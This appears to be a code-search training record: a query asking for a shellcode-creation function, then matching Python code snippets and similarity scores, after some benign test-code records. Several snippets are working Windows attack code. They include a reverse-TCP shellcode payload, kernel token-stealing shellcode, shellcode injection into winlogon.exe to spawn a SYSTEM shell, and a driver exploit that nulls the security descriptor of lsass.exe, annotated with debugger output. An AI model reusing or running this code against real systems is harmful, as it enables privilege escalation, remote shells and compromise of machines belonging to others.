should return nothing\n {'params': {'user': 2, 'domain': 0, 'effective': True},\n 'results': []},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def __subject_self(self):\n # Iterate over each row in the dataframe, check if the requirement type is not C and the name is a string (avoid NAs) and then extract the three letter subject code\n major_subject_names = pd.Series([ row['FULL'][0:3] if row['REQUIREMENT_TYPE'] != 'C' and isinstance(row['FULL'],str) else np.NAN for idx, row in self.major_map.cleaned_major_data.iterrows()])\n # Expand these matches over all of the students classes and all of the requirements\n tester = self.student.student_hist['FULL'].str[0:3].apply(lambda sub: sub == major_subject_names )\n return self.__get_reqs(tester)",
"def create_assignments(self, assignment_pattern, test_data):\n # First store how many assignments are already in the system,\n # so during the tests we can check the number of new assignments\n # created.\n test_data['initial_assignment_count'] = (\n len(self.assignment_api.list_role_assignments()))\n\n # Now create the new assignments in the test plan\n for assignment in assignment_pattern:\n # Each assignment is a dict of the form:\n #\n # { 'user': 0, 'project':1, 'role': 6}\n #\n # where the value of each item is the index into the array of\n # entities created earlier.\n #\n # We process the assignment dict to create the args required to\n # make the create_grant() call.\n args = {}\n for param in assignment:\n if param == 'inherited_to_projects':\n args[param] = assignment[param]\n else:\n # Turn 'entity : 0' into 'entity_id = ac6736ba873d'\n # where entity in user, group, project or domain\n key, value = self._convert_entity_shorthand(\n param, assignment, test_data)\n args[key] = value\n self.assignment_api.create_grant(**args)\n return test_data",
"def group_assignments(assignment_list):\n return group_nodes(assignment_list, 1)"
] |
[
"0.59990984",
"0.58262056",
"0.58262056",
"0.5773726",
"0.5773726",
"0.57599586",
"0.5723594",
"0.5658932",
"0.5651273",
"0.5588515",
"0.55587524",
"0.54874307",
"0.5484704",
"0.54762024",
"0.54645294",
"0.5462985",
"0.54540384",
"0.5441348",
"0.54135805",
"0.541294",
"0.5402347",
"0.539048",
"0.5371929",
"0.5371929",
"0.53591335",
"0.53537565",
"0.5336408",
"0.5335546",
"0.53265196",
"0.53215194"
] |
0.9535195
|
0
|
Test case for get_group_class_types
|
def test_get_group_class_types(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_group_types(self):\r\n pass",
"def test_get_types(self):\n pass",
"def get_class(self, grp, class_type=\"NXcollection\"):\n coll = [grp[name] for name in grp\n if isinstance(grp[name], h5py.Group) and\n self.get_attr(grp[name], \"NX_class\") == class_type]\n return coll",
"def get_check_types():",
"def test_get_groups(self):\n pass",
"def test_get_groups(self):\n pass",
"def test_groups_get(self):\n pass",
"def test_groups_get(self):\n pass",
"def test_get_group(self):\n pass",
"def test___get_all_classes():\n config = {\"plugins\": [\"tests.mock_plugin\"]}\n classes = r._get_all_classes(config, r.DataSource)\n assert \"food\" in classes\n classes = r._get_all_classes(config, r.DataSink)\n assert \"food\" in classes",
"def test_get_device_groups(self):\n pass",
"def classes(self):\n raise NotImplementedError(\"Please implement this yourself.\")",
"def test_get_device_groups1(self):\n pass",
"def test_get_group_class_subject_assignments(self):\n pass",
"def test_get_contact_person_types(self):\n pass",
"def test_users_groups_get(self):\n pass",
"def testTypeDescendants(self):\n\n cmisClient = CmisClient(self.url, self.user, self.pwd,\n binding=self.binding,\n **self.ext_args)\n repo = cmisClient.getDefaultRepository()\n typeDefs = repo.getTypeDescendants()\n folderDef = None\n for typeDef in typeDefs:\n if typeDef.getTypeId() == 'cmis:folder':\n folderDef = typeDef\n break\n assert folderDef\n assert folderDef.baseId",
"def test_type_confict(setup_teardown_file):\n f = setup_teardown_file[3]\n grp = f.create_group(\"test\")\n\n grp.create_group('foo')\n with pytest.raises(TypeError):\n grp.require_dataset('foo', (10, 3), 'f')",
"def find_groups_from_ctypes(self, mesh, gtypes):\n ctypes = [self._ctypes[gtype] for gtype in gtypes]\n grp_names = []\n for geom in mesh.give_geom().get_children():\n if geom.get_shape_type() in ctypes:\n grp_names.append(geom.read_name())\n return grp_names",
"def decode_group_class(group_class_repr):\n\tloaded = {tuple(key): value for key, value in json.loads(group_class_repr)}\n\treturn cl.Counter(loaded)",
"def ntypes(self): # -> list[str]:\n ...",
"def Subclass_finder(cls):\n\n subclasses = [] # Create a list to deposit subclasses\n\n for subclass in cls.__subclasses__():\n subclasses.append(subclass) # Add founded subclass\n subclasses.extend(Subclass_finder(subclass)) # Check if there is a subclass\n # of a subclass.\n\n Output_types = [] # Create a list to deposit final strings\n for i in range(len(subclasses)): \n instance = subclasses[i]() # Create an instance for the \n Output_types.append(instance.kind) # Add them to the output list\n \n return Output_types",
"def get_classes(self):\n return",
"def test_collect_generic_classifier_dependencies(self, module_repo):\n expected_result = {(\"pack_with_generic_type\", True)}\n\n test_input = [\n {\n \"Dummy Classifier\": {\n \"name\": \"Dummy Classifier\",\n \"fromversion\": \"5.0.0\",\n \"definitionId\": \"assets\",\n \"pack\": \"dummy_pack\",\n \"incident_types\": [\"generic_type_id\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_classifiers_dependencies(\n pack_classifiers=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n assert set(found_result) == set(expected_result)",
"def get_num_classes(self):",
"def test_group_by_params_string_list_fields(self):\n group_params = {\"instance_type\": FAKE.word()}\n serializer = OCIGroupBySerializer(data=group_params)\n validation = serializer.is_valid()\n self.assertTrue(validation)\n result = serializer.data.get(\"instance_type\")\n self.assertIsInstance(result, list)",
"def test_api_v1_groups_get(self):\n pass",
"def test_transform_type(self):\n self.assertEqual(self.group_tr.getTransformType(), OCIO.TRANSFORM_TYPE_GROUP)",
"def new_class(self, grp, name, class_type=\"NXcollection\"):\n sub = grp.require_group(name)\n sub.attrs[\"NX_class\"] = numpy.string_(class_type)\n return sub",
"def test_get_all_instance_types(self):\n session = sql_session.get_session()\n total_instance_types = session.query(models.InstanceTypes).count()\n inst_types = instance_types.get_all_types()\n self.assertEqual(total_instance_types, len(inst_types))"
] |
[
"0.7822249",
"0.69615924",
"0.6546104",
"0.63630015",
"0.6300565",
"0.6300565",
"0.608619",
"0.608619",
"0.59768003",
"0.5951271",
"0.58344716",
"0.5772014",
"0.57074475",
"0.5700594",
"0.56738675",
"0.5659094",
"0.5655538",
"0.56528234",
"0.5627371",
"0.56217194",
"0.5607421",
"0.55819637",
"0.55700785",
"0.5564626",
"0.5564561",
"0.555984",
"0.5494493",
"0.5490339",
"0.54766184",
"0.54761547"
] |
0.9459802
|
0
|
Test case for get_list8
|
def test_get_list8(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_get_list(self):\n pass",
"def test_list(self):\n pass",
"def test_list(self):\n pass",
"def test_list_field():",
"def test_kyc_get_legal_list(self):\n pass",
"def test_getlist(self):\n flags = flag_lists(appversions={\"code\": \"fx1.0\"})\n eq_(flags, {(\"fx\", \"pl\"): [0],\n (\"fx\", \"de\"): [1],\n (\"fx\", \"fr\"): [2],\n (\"fx\", \"da\"): [1, 0]})",
"def test_listtem_using_get(self):\n pass",
"def test_list_identity(self):\n pass",
"def list():",
"def list():",
"def check_for_list(check):",
"def test_cards_get_list(self):\n pass",
"def test_get_direct_access_list(self):\n result = self.param_dict.get_direct_access_list()\n self.assertTrue(isinstance(result, list))\n self.assertEquals(len(result), 2)\n self.assert_(\"foo\" in result)\n self.assert_(\"baz\" in result)",
"def testGetList(self, tag, expected_value):\n actual_value = dicom_json.GetList(_DICOM_JSON, tag)\n self.assertEqual(actual_value, expected_value)",
"def test_kyc_get_natura_list(self):\n pass",
"def getListItem(*args):",
"def getListItem(*args):",
"def getListItem(*args):",
"def test_list_format(self) -> None:\n r = self.perform_request('list', False)\n self.assert_json_schema(r.json(), self.get_list_schema())",
"def test_get_value_list_result(self):\n test_data = []\n test_data.append(json.loads('{\"name\": \"Pat\"}'))\n test_data.append(json.loads('{\"last_name\": \"Nat\"}'))\n test_data.append(json.loads('{\"name\": \"Gwen\"}'))\n\n key = \"name\"\n result_list = get_value_list(test_data, key)\n self.assertTrue(len(result_list) == 2)",
"def getList(self):",
"def getList(self):",
"def test_list_group(self):\n pass",
"def get_list(self, *args, **kwargs):\n pass",
"def get_list(self, *args, **kwargs):\n pass",
"def test_get_value_list_value(self):\n test_data = []\n test_data.append(json.loads('{\"name\": \"Pat\"}'))\n test_data.append(json.loads('{\"last_name\": \"Nat\"}'))\n\n key = \"name\"\n result_list = get_value_list(test_data, key)\n self.assertTrue(result_list == ['Pat'])",
"def test_get_list_empty(self):\r\n result = self.get_json(self.LIST_URI)\r\n self.assertEqual(result[\"count\"], 0)\r\n self.assertIsNone(result[\"next\"])\r\n self.assertIsNone(result[\"previous\"])\r\n self.assertEqual(result[\"results\"], [])",
"def test_get_operations_list_with_correct_data(self):\n ops = self.client.get_operations_list(self.agent_id)\n self.assertIsInstance(ops, list)",
"def test_fromlist(self):\n\n self.assertRaises(TypeError, self.hw, [])",
"def test_get_startup_list(self):\n result = self.param_dict.get_startup_list()\n self.assertTrue(isinstance(result, list))\n self.assertEquals(len(result), 2)\n self.assert_(\"foo\" in result)\n self.assert_(\"bar\" in result)"
] |
[
"0.7849026",
"0.71710646",
"0.71710646",
"0.67199636",
"0.6585331",
"0.65528893",
"0.6541352",
"0.64944035",
"0.6406276",
"0.6406276",
"0.63428843",
"0.6257347",
"0.6197544",
"0.6124488",
"0.61166626",
"0.6104026",
"0.6104026",
"0.6104026",
"0.6095149",
"0.60723835",
"0.60653335",
"0.60653335",
"0.6039578",
"0.60086685",
"0.60086685",
"0.6000144",
"0.59615636",
"0.5936555",
"0.59318984",
"0.5921862"
] |
0.9190918
|
0
|
Test case for update9
|
def test_update9(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_4_4_1_1(self):\n pass",
"def test_update_system(self):\n pass",
"def test_update_case(self):\n pass",
"def test_update_state4(self):\n pass",
"def test_update(self):\n # this is tested graphically, as it is UI\n pass",
"def test_update(self):\n pass",
"def test_update(self):\n pass",
"def test_update(self):\n pass",
"def test_version(self):\n pass",
"def test_update_state3(self):\n pass",
"def test_upgrade_with_auto_upgrade_latest_engine_enabled():",
"def test_update_scenario(self):\n pass",
"def test_update_state2(self):\n pass",
"def test_update_state1(self):\n pass",
"def test_change_provisioned_throughput_usual_case():",
"def test_uparforvarg(self):",
"def test_T01():",
"def test_get_version(self):\n pass",
"def _test(self):",
"def _test(self):",
"def _test(self):",
"def _test(self):",
"def _test(self):",
"def dummy_update( self ):\r\n pass",
"def test_patch_bios_unit(self):\n pass",
"def testDirtyRefresh(self):\n \n pass",
"def test_update_state(self):\n pass",
"def test_T4():",
"def test_T4():",
"def test(self):\n pass"
] |
[
"0.7360029",
"0.7172825",
"0.7060694",
"0.6966549",
"0.68949056",
"0.68932676",
"0.68932676",
"0.68932676",
"0.68491435",
"0.6751525",
"0.66580385",
"0.6636913",
"0.66286045",
"0.6586873",
"0.65783006",
"0.6496448",
"0.6440388",
"0.63663083",
"0.632522",
"0.632522",
"0.632522",
"0.632522",
"0.632522",
"0.632505",
"0.6313759",
"0.62958956",
"0.62931097",
"0.6284523",
"0.6284523",
"0.62782234"
] |
0.84707344
|
0
|
Function for create shellcode
|
def create_shellcode(self, _shellcode_type='', command='calc.exe', message='', encode=None, make_exe=0, debug=0):
generator = ShellGenerator(self.OS_TARGET, self.OS_TARGET_ARCH)
shellcode = generator.get_shellcode(_shellcode_type,
connectback_ip=self.CONNECTBACK_IP,
connectback_port=self.CONNECTBACK_PORT,
command=command,
message=message,
make_exe=make_exe,
debug=debug)
if encode:
if debug == 1:
print "[] Encode shellcode is on and started"
e = CodeEncoders(self.OS_SYSTEM, self.OS_TARGET, self.OS_TARGET_ARCH, self.BADCHARS)
e_shellcode = e.encode_shellcode(shellcode, encode, debug)
if debug == 1:
print "Length of encoded shellcode: %d" % len(e_shellcode)
print "[] Encode shellcode finished"
if e_shellcode:
shellcode = e_shellcode
else:
if debug == 1:
print "[] Encode shellcode is off"
return shellcode
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code",
"def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode",
"def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)",
"def make_codes(self):\n\t\troot = heapq.heappop(self.heap)#obtenemos la raiz del arbol\n\t\tcurrent_code = \"\"\n\t\tself.make_codes_helper(root, current_code)",
"def make_shell_cmd(self, locals):\n\t\tdef cmd_shell():\n\t\t\timport code\n\t\t\tcode.interact(banner=self.shell_banner, local=locals, exitmsg='Returning to command shell...')\n\n\t\treturn cmd_shell",
"def create_code(root_node):\r\n huff_list = [\"\"] * 256\r\n code = \"\"\r\n return create_code_helper(root_node, code, huff_list)",
"def inject_shellcode(winlogon_pid): \n \n # Get winlogon.exe pid\n pid = winlogon_pid\n\n # Get a handle to the winprinton process we are injecting into \n hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))\n\n if not hProcess:\n debug_print(\"\\t[-] Couldn't acquire a handle to PID: %s\" % pid)\n sys.exit()\n\n debug_print(\"\\n\\t[+] Obtained handle [0x%x] for the winlogon.exe process\" % hProcess)\n \n # Creating shellcode buffer to inject into the host process\n # https://packetstormsecurity.com/files/142572/Microsoft-Windows-32-bit-64-bit-cmd.exe-Shellcode.html\n SHELLCODE = (\n \"\\x31\\xc9\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x40\\x1c\\x8b\\x04\\x08\"\n \"\\x8b\\x04\\x08\\x8b\\x58\\x08\\x8b\\x53\\x3c\\x01\\xda\\x8b\\x52\\x78\\x01\"\n \"\\xda\\x8b\\x72\\x20\\x01\\xde\\x41\\xad\\x01\\xd8\\x81\\x38\\x47\\x65\\x74\"\n \"\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\"\n \"\\x64\\x64\\x72\\x65\\x75\\xe2\\x49\\x8b\\x72\\x24\\x01\\xde\\x66\\x8b\\x0c\"\n \"\\x4e\\x8b\\x72\\x1c\\x01\\xde\\x8b\\x14\\x8e\\x01\\xda\\x89\\xd6\\x31\\xc9\"\n \"\\x51\\x68\\x45\\x78\\x65\\x63\\x68\\x41\\x57\\x69\\x6e\\x89\\xe1\\x8d\\x49\"\n \"\\x01\\x51\\x53\\xff\\xd6\\x87\\xfa\\x89\\xc7\\x31\\xc9\\x51\\x68\\x72\\x65\"\n \"\\x61\\x64\\x68\\x69\\x74\\x54\\x68\\x68\\x41\\x41\\x45\\x78\\x89\\xe1\\x8d\"\n \"\\x49\\x02\\x51\\x53\\xff\\xd6\\x89\\xc6\\x31\\xc9\\x51\\x68\\x65\\x78\\x65\"\n \"\\x20\\x68\\x63\\x6d\\x64\\x2e\\x89\\xe1\\x6a\\x01\\x51\\xff\\xd7\\x31\\xc9\"\n \"\\x51\\xff\\xd6\"\n )\n\n sh = create_string_buffer(SHELLCODE, len(SHELLCODE))\n code_size = len(SHELLCODE) \n \n # Allocate some space for the shellcode (in the program memory)\n sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, \n PAGE_EXECUTE_READWRITE)\n if not sh_address:\n debug_print(\"\\t[-] Could not allocate shellcode in the remote process\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Allocated memory at address 0x%x\" % sh_address)\n\n # Inject shellcode in to winlogon.exe process space\n written = LPVOID(0)\n shellcode = DWORD(sh_address)\n dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, \n byref(written))\n if not dwStatus:\n debug_print(\"\\t[-] Could not write shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n \n debug_print(\"\\t[+] Injected %d bytes of shellcode to 0x%x\" % (written.value, sh_address))\n\n # Now we create the remote thread and point its entry routine to be head of \n # our shellcode\n thread_id = HANDLE(0)\n if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, \n byref(thread_id)):\n debug_print(\"\\t[-] Failed to inject shellcode into winlogon.exe\")\n getLastError()\n sys.exit()\n\n debug_print(\"\\t[+] Remote thread 0x%x created\" % thread_id.value)\n debug_print(\"\\t[+] Spawning SYSTEM shell...\")\n # Kill python process to kill the window and avoid BSODs\n #os.kill(os.getpid(), signal.SIGABRT)\n\n debug_print(\"\\n\\t\\t[*] Remote thread created with a thread ID of: [%x]\" % thread_id.value)\n debug_print(\"\\t\\t[+] ***BOOM!!\")",
"def code():",
"def _make_code(self, name, code):\n path = os.path.join(self.meta, name)\n data = code.encode('utf8') if isinstance(code, unicode) else code\n with open(path, 'w') as f:\n f.write(data)\n return path",
"def generateShellcode(self, listener: str, staged: bool = False, x64: bool = True) -> bytes:\t\t\n\t\treturn self.generatePayload(listener, ArtifactType.RAW, staged=staged, x64=x64)",
"def __init__(self, name, shell_type, proto, code, os=None, arch=None, use_handler=None, use_http_stager=None):\r\n\r\n # These are the required attributes;\r\n self.name = name\r\n self.type = shell_type\r\n self.proto = proto\r\n self.code = code\r\n\r\n # These are optional attributes;\r\n self.os = \"Unknown\" if os is None else os\r\n self.arch = \"Unknown\" if arch is None else arch\r\n self.handler = None if use_handler is None else use_handler # this is going to be the handler function.\r\n self.handler_args = None # this is going to be set during execution.\r\n\r\n self.use_http_stager = False if use_http_stager is None else use_http_stager\r\n return",
"def get_shell(self, shell):",
"def _exploit(code):\n shellcode_ptr, shellcode_len = _ret_shellcode_buffer() # shellcode virtual allocation\n\n debug_print(\"\\n[*] User-land shellcode allocated at: [0x%x]\\n\" % shellcode_ptr)\n debug_print(hexdump(shellcode_ptr, 32))\n \"\"\"\n 3: kd> !process 0 0 lsass.exe\n PROCESS [87662d40] SessionId: 1 Cid: 0214 Peb: 7ffd9000 ParentCid: 01ac\n DirBase: be6e20e0 ObjectTable: 9aa8a008 HandleCount: 116.\n Image: lsass.exe\n\n 3: kd> dps 87662d40-4\n 87662d3c 8c005e1f => OVERFLOW HERE WITH [0x00000000] \n 87662d40 00260003 AND GET ALL PERMISSIONS OF [lsass.exe] process W/ WHATAEVER USER\n 87662d44 00000001\n 87662d48 87662d48\n 87662d4c 87662d48\n 87662d50 87662d50\n 87662d54 87662d50\n 87662d58 be6e20e0\n 87662d5c 00000000\n 87662d60 00000000\n\n 3: kd> !object 87662d40 \n Object: 87662d40 Type: (85611d58) Process\n ObjectHeader: [87662d28] (new version) => [dt nt!_OBJECT_HEADER 87662d28]\n HandleCount: 10 PointerCount: 106\n\n 3: kd> dt nt!_OBJECT_HEADER 87662d28 \n +0x000 PointerCount : 0n106\n +0x004 HandleCount : 0n10\n +0x004 NextToFree : 0x0000000a Void\n +0x008 Lock : _EX_PUSH_LOCK\n +0x00c TypeIndex : 0x7 ''\n +0x00d TraceFlags : 0 ''\n +0x00e InfoMask : 0x8 ''\n +0x00f Flags : 0 ''\n +0x010 ObjectCreateInfo : 0x82b44cc0 _OBJECT_CREATE_INFORMATION\n +0x010 QuotaBlockCharged : 0x82b44cc0 Void\n +0x014 SecurityDescriptor : 0x8c005e1d Void \n +0x018 Body : _QUAD\n\n 3: kd> !sd (0x8c005e1f - 0x7) => [SecurityDescription from lsass.exe process]\n ->Revision: 0x1\n ->Sbz1 : 0x0\n ->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n ->Owner : S-1-5-32-544\n ->Group : S-1-5-18\n ->Dacl : \n ->Dacl : ->AclRevision: 0x2\n ->Dacl : ->Sbz1 : 0x0\n ->Dacl : ->AclSize : 0x3c\n ->Dacl : ->AceCount : 0x2\n ->Dacl : ->Sbz2 : 0x0\n ->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[0]: ->AceFlags: 0x0\n ->Dacl : ->Ace[0]: ->AceSize: 0x14\n ->Dacl : ->Ace[0]: ->Mask : 0x001fffff\n ->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n ->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[1]: ->AceFlags: 0x0\n ->Dacl : ->Ace[1]: ->AceSize: 0x18\n ->Dacl : ->Ace[1]: ->Mask : 0x00121411\n ->Dacl : ->Ace[1]: ->SID: S-1-5-32-544\n\n ->Sacl : \n ->Sacl : ->AclRevision: 0x2\n ->Sacl : ->Sbz1 : 0x0\n ->Sacl : ->AclSize : 0x1c\n ->Sacl : ->AceCount : 0x1\n ->Sacl : ->Sbz2 : 0x0\n ->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n ->Sacl : ->Ace[0]: ->AceFlags: 0x0\n ->Sacl : ->Ace[0]: ->AceSize: 0x14\n ->Sacl : ->Ace[0]: ->Mask : 0x00000003\n ->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n \"\"\"\n \n lsass_pid = getPidByName(\"lsass.exe\")\n debug_print(\"\\n[!] lsass.exe PID: 0x%x\\n\" % lsass_pid)\n \n leaked_objects = get_handles(lsass_pid) # return lsass.exe handles (nt!_EPROCESS)\n \n #if leaked_objects:\n #debug_print(\"\\n[+] lsass.exe nt!_EPROCESS address leaked!!: [0x%x]\" % leaked_objects)\n \n for leak_obj in leaked_objects:\n\n SecurityDescription = leak_obj - 4 # nullify SecurityDescription located at [_EPROCESS - 4]\n debug_print(\"\\t\\t[*] Address of SecurityDescription to be nullify: [0x%x]\" % SecurityDescription)\n \n payload = struct.pack(\"<L\", SecurityDescription)\n payload_ptr = id(payload) + 0x14\n payload_len = len(payload)\n \n # send custom payload\n _send_payload(\n payload_ptr,\n payload_len,\n code\n )\n\n debug_print(\"[+] Exploit Payload Sent!\")\n debug_print(\"[!] 
Getting nt-authority/SYSTEM impersonated process shell...\")\n \n winlogon_pid = getPidByName(\"winlogon.exe\")\n return inject_shellcode(winlogon_pid) # get SYSTEM shell",
"def create_terminal() -> str:\n ...",
"def shell():\n pass",
"def create_code(node):\n code = []\n for i in range(256):\n code.append(i)\n _create_code_helper(node, '', code)\n return code",
